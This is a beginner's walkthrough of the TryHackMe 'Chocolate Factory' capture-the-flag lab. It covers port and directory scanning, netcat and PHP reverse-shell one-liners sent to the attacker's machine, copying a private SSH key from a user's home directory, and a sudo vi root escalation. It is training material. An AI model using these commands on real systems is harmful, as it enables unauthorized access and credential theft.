Chocolate Factory @ TryHackMe write-up

Hello all! This is a write-up for the funny Chocolate Factory room at tryhackme.com. Since I’m a beginner my self, I chose a beginner friendly room to start my write-up writer career.

Welcome and let’s get started!

And the first thing is… enumerate!

Let’s run nmap:

nmap -p- <target-machine-ip>

Wow!! So many open ports!!

Let’s check what are they running and pull up nmap again. This time I’ll save the output to a file.

nmap -p 21,22,80,100–125 -T4 -A -oA chocolate-nmap <target-machine-ip>

Opening the report on our text editor, we can see a lot of… ASCII?

And this goes on until the end… except for port 113:

Well, there is some key somewhere on the web server. Let us take note of this and check de website.

Open the browser and enter the machine IP address:

We are presented with a login page but we do not know the credentials. I guess brute-forcing this would be an option, but I usually save that as a last resort.

Let’s check the source code of the page.

A simple POST form that sends the data to a PHP file called validator.php.

Continuing with the discovery phase, let’s enumerate the web server directories and files using Gobuster:

gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://<target-machine-IP> -t 50 -x php,txt,htm,html,cfg -s 200,301,304

Nice! Gobuster shows us 3 files. Index.html and validate.php we already know, so let’s navigate to home.php.

I guess we can run commands from this page. Let’s try some.

id

www-data, as expected, I guess. Check the directory contents with ls.

ls -al

It’s kind of hard to read, so let’s arrange this:

Remember what nmap found on port 113, referring some key_rev_key file? There it is! But, what kind of file is it?

file key_rev_key

It is a binary executable. We can, probably, get something out of it. Maybe later.

This interface is kinda rude, let’s try to get a shell and check if the system has netcat installed, running

whereis nc

Well, it has. Setup a listener on your box and launch a netcat reverse shell from the page.

nc -nvlp 65000

nc -n <your-machine-ip> -e /bin/bash

And nothing happens…

Since the web server runs PHP, it must have PHP installed…

whereis php

So grab one of the one liners from the fantastic Swissky’s repo on github, PayloadsAllTheThings, reverse shell cheat sheet.

Again, setup a listener on your box and launch the PHP one liner reverse shell from the page.

nc -nvlp 65000

/usr/bin/php -r ‘$sock=fsockopen(“<your-machine-ip>”,65000);exec(“/bin/sh -i <&3 >&3 2>&3”);’

And we got shell!!

Let’s make it more usable:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

export TERM=screen

CTRL + Z

stty raw -echo

fg

Now we have pretty little shell…

Check the files in this directory.

ls -al

We can read most of those files. We already know that key_rev_key is an executable file but we do not have permissions to run it.

Take a peek at validate.php.

cat validate.php

And we have “charlie” password for the web application!

If we enter those credentials on the login page, we are taken to… home.php. And it is just the same as if we would get there directly.

OK, so let’s talk a walk through the filesystem.

ls -al /home

We can try to change user to charlie using the same password… but it does not work.

We have permissions to check charlie’s home directory, so why not?

ls -al /home/charlie

Well, we cannot read the user flag, but we can check those teleport files

cat teleport

cat teleport.pub

Nice!! Public and private RSA keys that will allow us to ssh into the machine as charlie!

Copy the contents of the private key file, teleport, to a file on your machine. We can simply copy/paste from the previous cat command.

Then, on your machine, run the ssh client with the identity flag pointing to the file you just created.

ssh charlie@<target-machine-ip> -i teleport

And we are charlie! Let’s jump to charlie’s home dir, in /home/charlie and grab that user flag!

cd /home/charlie && cat user.txt

Now, we return to the web server public directory, located at /var/www/html and run key_rev_key.

Remember, this is a CTF. On a real pentesting job, DO NOT RUN UNKNOWN EXECUTABLES!

cd /var/www/html

chmod +x key_rev_key

./key_rev_key

The program asks for a name that we do not have, but it might be hardcoded in it. Let’s run strings on it.

strings key_rev_key

It gives us a bunch of strings. Let’s focus on those we are more familiar with.

Although “laksdhfas” is weird, let’s feed it to the program.

Well done! We got a key!

Now, for the root!!

Run sudo to check what charlie can or cannot do without password

sudo -l

We can run the vim text editor as root. That should be fun! If you search the GTFOBins for vi, you’ll find that it will be easy to become root. Just run:

sudo vi -c ‘:!/bin/bash’ /dev/null

Just grab that root flag, and we are done!

Thanks for reading this write-up. Hope you enjoyed this Chocolate Factory!